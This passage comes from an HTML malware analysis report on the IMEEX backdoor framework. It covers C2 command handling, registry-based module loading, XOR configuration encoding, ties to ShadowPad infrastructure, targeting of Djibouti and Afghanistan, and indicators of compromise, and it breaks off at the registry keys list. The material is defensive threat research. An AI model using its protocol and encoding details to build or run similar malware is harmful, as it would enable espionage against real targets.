&lt;p&gt;If any errors occur (such as checksum failures, write errors, or network
issues), the function deletes the temporary file and sends an error response to
the C2 server.&lt;/p&gt;
&lt;h5&gt;Delete File Specified in Registry&lt;span class="hx:absolute hx:-mt-20" id="delete-file-specified-in-registry"&gt;&lt;/span&gt;
&lt;a href="#delete-file-specified-in-registry" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;This function deletes a file based on the registry key it receives from the C2.
The operation accesses the registry at the path:
&lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\IMEEX\&amp;lt;provided_key&amp;gt;&lt;/code&gt;, and the subkey
&amp;ldquo;N&amp;rdquo; that stores paths to files on the machine. It attempts to delete the file
and, if unsuccessful, moves it to a temporary location and schedules it for
deletion upon the next system restart using
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-movefileexw"target="_blank" rel="noopener"&gt;MoveFileExW&lt;/a&gt;.&lt;/p&gt;
&lt;h5&gt;Write Values to Registry Keys&lt;span class="hx:absolute hx:-mt-20" id="write-values-to-registry-keys"&gt;&lt;/span&gt;
&lt;a href="#write-values-to-registry-keys" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;This operation writes specific values to the Windows Registry under the keys
&amp;ldquo;A&amp;rdquo; and &amp;ldquo;P&amp;rdquo; within the path &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\IMEEX\&amp;lt;ID&amp;gt;&lt;/code&gt;.
The function receives the data in a structure named RegistryWriteData. The
value of &lt;ID&gt; is received from the attacker.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Byte Offset&lt;/th&gt;
&lt;th&gt;Field Name&lt;/th&gt;
&lt;th&gt;Size (Bytes)&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;RegistryPathID&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Identifier for the registry path (a number)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Reserved&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Reserved for future use or alignment&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;ValueAData&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Data for registry key &amp;ldquo;A&amp;rdquo;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;ValuePSize&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Size of ValuePData&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;ValuePData&lt;/td&gt;
&lt;td&gt;ValuePSize&lt;/td&gt;
&lt;td&gt;Data for registry key &amp;ldquo;P&amp;rdquo;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;The function begins by determining whether it should write to the registry key
&amp;ldquo;A&amp;rdquo;. It checks if ValueAData is equal to -1; if so, it interprets this as a
signal to skip writing to key &amp;ldquo;A&amp;rdquo;. Otherwise, it attempts to write the provided
data to registry key &amp;ldquo;A&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;Similarly, for the registry key &amp;ldquo;P&amp;rdquo;, the function examines ValuePSize. If this
value is zero, it determines that writing to key &amp;ldquo;P&amp;rdquo; is unnecessary. Otherwise,
it attempts to write the data pointed to by ValuePData to the registry key &amp;ldquo;P&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;The function constructs the full registry path as
&lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\IMEEX\&amp;lt;ID&amp;gt;&lt;/code&gt;, where it writes the data to
keys &amp;ldquo;A&amp;rdquo; and &amp;ldquo;P&amp;rdquo; after encoding the input string using a reversible XOR-based
encoding algorithm.&lt;/p&gt;
&lt;p&gt;The function allocates memory and encodes the data for the registry keys using
a simple, reversible encoding process. Each character of the input string is
modified using an XOR operation, starting with an initial seed value of 0xE4.
The modified characters are then split into high and low 4-bit nibbles and
mapped to ASCII characters starting from &amp;lsquo;A&amp;rsquo;. The encoded data is stored in an
output array, ensuring it does not exceed twice the length of the original
input.&lt;/p&gt;
&lt;p&gt;Essentially, it the operation creates to WIndows Registry paths:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\IMEEX\&amp;lt;ID&amp;gt;\A&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\IMEEX\P&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\IMEEX\&amp;lt;ID&amp;gt;\N&lt;/code&gt; (Was created by the
write function described above)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The framework uses these subkeys to track executed modules, with &lt;ID&gt; serving
as the module identifier. It&amp;rsquo;s unclear whether these values follow a specific
scheme or are chosen arbitrarily.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Subkey &amp;ldquo;A&amp;rdquo; stores execution type information.&lt;/li&gt;
&lt;li&gt;Subkey &amp;ldquo;P&amp;rdquo; holds configuration or additional parameters.&lt;/li&gt;
&lt;li&gt;Subkey &amp;ldquo;N&amp;rdquo; contains the module&amp;rsquo;s file path.&lt;/li&gt;
&lt;/ul&gt;
&lt;h5&gt;Execute a Module&lt;span class="hx:absolute hx:-mt-20" id="execute-a-module"&gt;&lt;/span&gt;
&lt;a href="#execute-a-module" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;This operation handles dynamic retrieval and loading of modules, specifically
DLL files, from the Windows Registry based on instructions from the C2.&lt;/p&gt;
&lt;p&gt;Below is a table that represents the structure of the packet that is being sent
to the Module Load operation:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Byte Offset&lt;/th&gt;
&lt;th&gt;Size&lt;/th&gt;
&lt;th&gt;Field Name&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;12 bytes&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;The header of the packet as described in the previous section&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;4 bytes&lt;/td&gt;
&lt;td&gt;moduleID&lt;/td&gt;
&lt;td&gt;Represents the identifier in the WIndows Registry for the module to be executed.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;4 bytes&lt;/td&gt;
&lt;td&gt;executionType&lt;/td&gt;
&lt;td&gt;Specifies the type of execution (2, 3, or other) to determine how the module should be run.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;20&lt;/td&gt;
&lt;td&gt;4 bytes&lt;/td&gt;
&lt;td&gt;numberOfParameters&lt;/td&gt;
&lt;td&gt;Number of parameters passed to the module function.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;24&lt;/td&gt;
&lt;td&gt;4 bytes&lt;/td&gt;
&lt;td&gt;params[]&lt;/td&gt;
&lt;td&gt;Array of parameters passed to the module function as part of the execution call.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;The function first checks if the module, identified by &lt;code&gt;moduleID&lt;/code&gt;, is already
loaded in memory by traversing a linked list of loaded modules. If found, it
returns a pointer to the module&amp;rsquo;s information, avoiding redundant loading.&lt;/p&gt;
&lt;p&gt;If the module is not loaded, the function retrieves the module&amp;rsquo;s name from the
Windows Registry (subkey &amp;ldquo;N&amp;rdquo;), allocates memory, and attempts to load the
module using &lt;code&gt;LoadLibraryW&lt;/code&gt;. It then locates the &amp;ldquo;Execute&amp;rdquo; function with
&lt;code&gt;GetProcAddress&lt;/code&gt;. Once found, the module is added to the linked list for future
use. If the function fails at any point, it cleans up by freeing memory and
unloading the module, returning an error code.&lt;/p&gt;
&lt;p&gt;Once loaded, the function checks the &lt;code&gt;executionType&lt;/code&gt; received from the C2, with
three possible options:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Load configuration from the Registry and execute (executionType = 2)&lt;/strong&gt;: The
function checks if the module is in memory. If not, it loads it again and
retrieves additional data from
HKEY_LOCAL_MACHINESoftwareMicrosoftIMEEX&lt;moduleID&gt;P, invoking the &amp;ldquo;Execute&amp;rdquo;
function. If successful, the module&amp;rsquo;s execution state is updated to prevent
re-execution.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Load and execute with predefined values (executionType = 3)&lt;/strong&gt;: Similar to
the previous case, it finds the module in memory, executes it with hardcoded
arguments, and updates its state post-execution.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Execute with parameters from the C2 (executionType is not 2 or 3)&lt;/strong&gt;: The
function directly passes the C2 parameters to the module. If successful, the
result is sent back to the C2; otherwise, an error is reported.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This module execution process allows the framework to dynamically load and
execute modules from the Windows Registry, ensuring that each module is
executed only once while tracking their execution states. Results from
successful executions are sent back to the C2, with error handling and cleanup
in case of failure.&lt;/p&gt;
&lt;p&gt;The framework also has a dedicated process that iterates over the values stored
in the subkey &amp;ldquo;A&amp;rdquo; (stores the execution type of the module), and if the value
is not 0 – it would run the module if it&amp;rsquo;s not already running.&lt;/p&gt;
&lt;h5&gt;Retrieve IMEEX framework Windows Registry Values&lt;span class="hx:absolute hx:-mt-20" id="retrieve-imeex-framework-windows-registry-values"&gt;&lt;/span&gt;
&lt;a href="#retrieve-imeex-framework-windows-registry-values" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;This operation retrieves numeric subkeys from the malware&amp;rsquo;s registry location:
&lt;code&gt;Software\Microsoft\IMEEX&lt;/code&gt;. It gathers the subkeys and their values,
transmitting the data over a network socket. If data is cached in memory, it is
included in the packet. The stored data, encrypted with XOR, is decoded before
transmission and sent to the C2 in chunks.&lt;/p&gt;
&lt;p&gt;If no subkeys are found or an error occurs, an empty packet or error code is
returned. The function processes all subkeys until transmission is complete,
ensuring proper packet structure and network integrity. A final checksum is
computed and sent with the remaining data.&lt;/p&gt;
&lt;h4&gt;Driver Operation&lt;span class="hx:absolute hx:-mt-20" id="driver-operation"&gt;&lt;/span&gt;
&lt;a href="#driver-operation" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;This operation is executed if the command received by the framework does not
match any of the specified operations. The framework calls
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-getlogicaldrives"target="_blank" rel="noopener"&gt;GetLogicalDrives&lt;/a&gt;
to retrieve a bitmask representing available disk drives and compares it to a
stored global variable containing previously retrieved information. If a
mismatch is found, the framework calls the Get Driver Information operation,
described under File Operations.&lt;/p&gt;
&lt;h2&gt;Attribution Indicators and The Geopolitics of The Region&lt;span class="hx:absolute hx:-mt-20" id="attribution-indicators-and-the-geopolitics-of-the-region"&gt;&lt;/span&gt;
&lt;a href="#attribution-indicators-and-the-geopolitics-of-the-region" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Network Pivoting&lt;span class="hx:absolute hx:-mt-20" id="network-pivoting"&gt;&lt;/span&gt;
&lt;a href="#network-pivoting" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Our investigation into the IMEEX framework was assisted by Tom Hegel from
SentinelOne, who provided valuable information about C2 domains. The analysis
reveals a potential connection between several domains and IP addresses,
suggesting shared infrastructure with ShadowPad – a privately sold modular
malware platform used by at least four clusters of Chinese espionage activity,
allowing threat actors to access advanced anti-detection and persistence
techniques without developing their own backdoors.&lt;/p&gt;
&lt;p&gt;The domain &lt;code&gt;bbsnews.sytes.net&lt;/code&gt; is resolved to the IP address 103.151.229.184
from Hong Kong, which is a generally unused address. Further investigation
shows that this IP has been linked to several other domains:
&lt;code&gt;cha.ylsyzxxwgov.cn&lt;/code&gt;, &lt;code&gt;ftp-server.serveftp.com&lt;/code&gt;, and
&lt;code&gt;it-technology.serveblog.net&lt;/code&gt;, indicating a potential relationship between
these entities. Notably, prior to using 103.151.229.184,
&lt;code&gt;ftp-server.serveftp.com&lt;/code&gt; was hosted on the similar IP address 103.151.229.52,
which hosted domains linked to ShadowPad activity in 2022, as reported by
&lt;a href="https://web.archive.org/web/20220814120943/https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf"target="_blank" rel="noopener"&gt;PT Security&lt;/a&gt;
(such as point.linkpc.net). Another IP address, 38.60.200.224, also hosted
multiple shadowpad-linked domains, including connecter.publicvm.com, previously
identified as part of the Shadowpad malware
&lt;a href="https://www.sentinelone.com/labs/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/"target="_blank" rel="noopener"&gt;by SentinelOne&lt;/a&gt;
in 2021, and which was also hosted on 103.151.229.52.&lt;/p&gt;
&lt;p&gt;The investigation has uncovered a potential connection between several domains
and IP addresses, suggesting shared infrastructure with the use of ShadowPad by
multiple Chinese APT groups. However, this does not strongly indicate specific
attribution to a particular group, but rather suggests a possible rotation from
ShadowPad to another toolset.&lt;/p&gt;
&lt;h3&gt;IMEEX targeting Djibouti&lt;span class="hx:absolute hx:-mt-20" id="imeex-targeting-djibouti"&gt;&lt;/span&gt;
&lt;a href="#imeex-targeting-djibouti" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2024/10/technical-analysis-of-a-novel-imeex-framework/images/fig2.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;Djibouti holds significant geopolitical importance due to its strategic
location at the crossroads of the Red Sea and the Gulf of Aden, controlling
access to one of the world&amp;rsquo;s busiest maritime routes. This small East African
nation
&lt;a href="https://moderndiplomacy.eu/2024/02/21/strategic-significance-of-djibouti-a-geopolitical-playground-for-global-powers/#:~:text=The%20militaries%20of%20France%2C%20Saudi%20Arabia%2C%20and%20Japan%20rub%20shoulders%20here%20with%20the%20US.%20What%E2%80%99s%20even%20more%20surprising%20is%20that%20so%20does%20China.%20India%20and%20Russia%20are%20keen%20to%20join%20in%20too.%20Despite%20its%20chaotic%20neighbors%2C%20Djibouti%20offers%20an%20excellent%20position%20for%20foreign%20militaries%20to%20project%20their%20power."target="_blank" rel="noopener"&gt;hosts military bases&lt;/a&gt;
from several global powers, including the U.S., France, and Japan, making it a
critical hub for military and trade operations. Notably, Djibouti is home to
&lt;a href="https://thediplomat.com/2021/01/china-consolidates-its-commercial-foothold-in-djibouti/#:~:text=In%20recent%20years%2C%20China%2DDjibouti%20relations%20have%20developed%20and%20achieved%20fruitful%20results%20in%20various%20fields.%20In%202017%2C%20China%20established%20a%20naval%20base%20in%20Djibouti%2C%20representing%20the%20first%20time%20it%20has%20sought%20a%20permanent%20military%20presence%20beyond%20its%20borders."target="_blank" rel="noopener"&gt;China&amp;rsquo;s first overseas military base&lt;/a&gt;,
established in 2017, which has become a central part of China&amp;rsquo;s Belt and Road
Initiative (BRI). This base helps China secure its economic and military
interests in the region, particularly along vital shipping lanes connecting the
Indian Ocean to Europe via the Suez Canal.
&lt;a href="https://www.cfr.org/blog/chinas-strategy-djibouti-mixing-commercial-and-military-interests"target="_blank" rel="noopener"&gt;China&amp;rsquo;s involvement&lt;/a&gt;
in Djibouti extends beyond military interests, with heavy investments in
infrastructure like railways, ports, and a free trade zone. These efforts
support
&lt;a href="https://djiboutiembassykuwait.net/en/p/index/14#:~:text=Djibouti%202035%27s%20core%20economic%20objective,than%20200%2C000%20jobs%20by%202035."target="_blank" rel="noopener"&gt;Djibouti&amp;rsquo;s &amp;ldquo;Vision 2035&amp;rdquo; plan&lt;/a&gt;,
aimed at becoming a commercial and logistics hub for Africa. However, these
investments have also deepened Djibouti&amp;rsquo;s reliance on Chinese loans, raising
concerns about potential debt dependency.&lt;/p&gt;
&lt;p&gt;Given Djibouti&amp;rsquo;s strategic significance to China&amp;rsquo;s global trade routes and
military expansion, it is plausible that China could leverage cyber operations,
including potential malware attacks, to safeguard its interests. The country&amp;rsquo;s
proximity to important shipping lanes and the presence of multiple global
military powers, including the U.S. and France, make it a critical point for
espionage and intelligence gathering. Cyberattacks offer a low-risk,
high-reward method for China to monitor adversaries, gather intelligence, and
secure its foothold in Djibouti without escalating to open conflict. In this
competitive geopolitical environment, malware could be used to disrupt
operations that threaten China&amp;rsquo;s regional strategic goals, aligning with
Beijing&amp;rsquo;s broader approach of blending economic influence and military
presence.&lt;/p&gt;
&lt;h3&gt;IMEEX targeting Afghanistan&lt;span class="hx:absolute hx:-mt-20" id="imeex-targeting-afghanistan"&gt;&lt;/span&gt;
&lt;a href="#imeex-targeting-afghanistan" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2024/10/technical-analysis-of-a-novel-imeex-framework/images/fig3.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;China&amp;rsquo;s interests in Afghanistan are multifaceted, revolving around security,
economic influence, and geopolitical strategy. After the U.S. withdrawal and
the Taliban&amp;rsquo;s return to power, China has sought to
&lt;a href="https://www.rferl.org/a/afghanistan-taliban-china-goals/31420549.html"target="_blank" rel="noopener"&gt;fill the power vacuum&lt;/a&gt;
by fostering stronger relations with Afghanistan. Key interests include
securing China&amp;rsquo;s western border, ensuring stability in the region, and
safeguarding investments under the Belt and Road Initiative (BRI). The
expansion of the China-Pakistan Economic Corridor (CPEC) into Afghanistan is
crucial for enhancing regional connectivity and trade, linking China to Central
Asia and beyond.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://global.chinadaily.com.cn/a/202305/07/WS6457244aa310b6054fad1807.html"target="_blank" rel="noopener"&gt;Security is a significant concern for China&lt;/a&gt;,
especially with regard to extremist groups that could threaten its investments
or spill over into its own territories, like Xinjiang. Afghanistan&amp;rsquo;s
instability presents risks to China&amp;rsquo;s projects and personnel in the region,
which may motivate the use of malware as a tool to monitor potential threats,
gather intelligence, and protect its strategic interests. Cyber operations
could also help China track the activities of other foreign powers or influence
local dynamics without direct intervention.&lt;/p&gt;
&lt;p&gt;Given the volatile situation and China&amp;rsquo;s deep economic and strategic interests,
the deployment of malware could serve as a low-cost, effective means of
advancing China&amp;rsquo;s goals in Afghanistan.&lt;/p&gt;
&lt;h3&gt;Analysis of Variants or Related Samples&lt;span class="hx:absolute hx:-mt-20" id="analysis-of-variants-or-related-samples"&gt;&lt;/span&gt;
&lt;a href="#analysis-of-variants-or-related-samples" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;sha256: &lt;code&gt;6fcd206752cd87c26909ed3751b94eb8ef14cd1567d3757cae7fa0b89d3f77c7&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The malware sample submitted to VirusTotal from Afghanistan features a
compilation timestamp of April 4, 2016. This date is more recent than other
known variants, which were compiled between 2014 and 2015. Despite the newer
timestamp, the Afghan variant has fewer capabilities compared to its
predecessors, indicating a reduction in functionality despite the newer
compilation date.&lt;/p&gt;
&lt;p&gt;Upon execution, the malware creates a mutex with the value:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Global42EC381F&lt;/code&gt;&lt;/p&gt;
&lt;h3&gt;Codebase and Functional Differences&lt;span class="hx:absolute hx:-mt-20" id="codebase-and-functional-differences"&gt;&lt;/span&gt;
&lt;a href="#codebase-and-functional-differences" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;While the core codebase of the Afghan variant remains largely consistent with
other versions, there are notable differences in its operational capabilities:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Execution of additional modules&lt;/strong&gt;: This variant does not support the
execution of modules. Specifically, it lacks the functionality to store
arguments and information required for the remote execution of modules within
the Registry.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Process Management&lt;/strong&gt;: The malware cannot create or terminate processes.
This absence of process manipulation capabilities reduces its ability to
execute additional payloads or disrupt system processes, potentially limiting
its impact compared to more feature-rich variants.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Configuration Storage&lt;span class="hx:absolute hx:-mt-20" id="configuration-storage"&gt;&lt;/span&gt;
&lt;a href="#configuration-storage" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The method of storing configuration data in this variant differs from other
versions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Storage Location&lt;/strong&gt;: Unlike other variants, this version retrieves
configuration values from the read-only (.rdata) section of the binary
instead of loading configuration data from the end of the executable.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Obfuscation&lt;/strong&gt;: Each byte of the configuration data is XOR-encoded with
the value 0xEC. This simple obfuscation technique serves to conceal the
configuration information from straightforward analysis, requiring reverse
engineers to decode the data to understand the malware&amp;rsquo;s settings.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The C2 used by this variant is: &lt;code&gt;bbsnews.sytes[.]net&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;A script to decode the configuration of this variant is provided in the
appendix below.&lt;/p&gt;
&lt;h2&gt;Overall Assessment&lt;span class="hx:absolute hx:-mt-20" id="overall-assessment"&gt;&lt;/span&gt;
&lt;a href="#overall-assessment" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Considering the reduced functionality in execution of modules and process
operations, along with the modified method of configuration storage, this
variant appears to be a more &lt;strong&gt;compact iteration of the IMEEX Framework&lt;/strong&gt;. The
simplifications suggest a focus on specific operational objectives, potentially
prioritizing stealth and resource efficiency over comprehensive system control.
This makes the Afghan sample a potentially less versatile but more discreet
threat compared to its more feature-rich counterparts.&lt;/p&gt;
&lt;p&gt;Summary of supported commands by the Afghan variant:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Operation&lt;/th&gt;
&lt;th&gt;Commands Id&lt;/th&gt;
&lt;th&gt;Sub-Command Id&lt;/th&gt;
&lt;th&gt;Command&lt;/th&gt;
&lt;th&gt;Extra Parameters&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;File Operation&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Get Driver Info&lt;/td&gt;
&lt;td&gt;–&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;File/Directory&lt;/td&gt;
&lt;td&gt;Discovery File path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Write File&lt;/td&gt;
&lt;td&gt;File path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Read File&lt;/td&gt;
&lt;td&gt;File path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;6 (No number 5)&lt;/td&gt;
&lt;td&gt;Delete folder and content&lt;/td&gt;
&lt;td&gt;File path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remote Process Execution&lt;/td&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;–&lt;/td&gt;
&lt;td&gt;Create a Process and run a command&lt;/td&gt;
&lt;td&gt;Command to execute&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command Execution Using Windows Pipe&lt;/td&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Set a pipe connected to cmd&lt;/td&gt;
&lt;td&gt;–&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Terminate Pipe&lt;/td&gt;
&lt;td&gt;–&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Write to pipe&lt;/td&gt;
&lt;td&gt;Content&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Driver Operation&lt;/td&gt;
&lt;td&gt;–&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Check if new drivers were added&lt;/td&gt;
&lt;td&gt;–&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;A comparative analysis of the command processing functionalities in the
Djibouti and Afghan variants reveals similarities between the two versions.
Notably, the absence of the execution of modules is observed in the Afghan
variant, underscoring its functional deficiencies compared to the more
comprehensive Djibouti implementation.&lt;/p&gt;
&lt;p&gt;The function that processes the command in the Djibouti variant.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2024/10/technical-analysis-of-a-novel-imeex-framework/images/fig4.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The function that processes the command in the Afghan variant.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2024/10/technical-analysis-of-a-novel-imeex-framework/images/fig5.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;h2&gt;Technical Appendix: Indicators of Compromise&lt;span class="hx:absolute hx:-mt-20" id="technical-appendix-indicators-of-compromise"&gt;&lt;/span&gt;
&lt;a href="#technical-appendix-indicators-of-compromise" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Appendix A: File Names and Process Indicators&lt;span class="hx:absolute hx:-mt-20" id="appendix-a-file-names-and-process-indicators"&gt;&lt;/span&gt;
&lt;a href="#appendix-a-file-names-and-process-indicators" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Attempts to run as svchost.exe, imaadp.dll or rundll32.exe&lt;/p&gt;
&lt;h4&gt;Network Infrastructure&lt;span class="hx:absolute hx:-mt-20" id="network-infrastructure"&gt;&lt;/span&gt;
&lt;a href="#network-infrastructure" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;h5&gt;Domains:&lt;span class="hx:absolute hx:-mt-20" id="domains"&gt;&lt;/span&gt;
&lt;a href="#domains" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;yurtumawat.wwwhost[.]us&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;erkinhorshiden.onedumb[.]com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;45.141.139[.]146&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;bbsnews.sytes[.]net&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h5&gt;Port&lt;span class="hx:absolute hx:-mt-20" id="port"&gt;&lt;/span&gt;
&lt;a href="#port" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;ul&gt;
&lt;li&gt;443/TCP&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Mutexes&lt;span class="hx:absolute hx:-mt-20" id="mutexes"&gt;&lt;/span&gt;
&lt;a href="#mutexes" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;Global\4B59AFCC&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Global\42EC381F&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Global\3796878E&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Registry Keys&lt;span class="hx:absolute hx:-mt-20" id="registry-keys"&gt;&lt;/span&gt;
&lt;a href="#registry-keys" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;ul&gt;
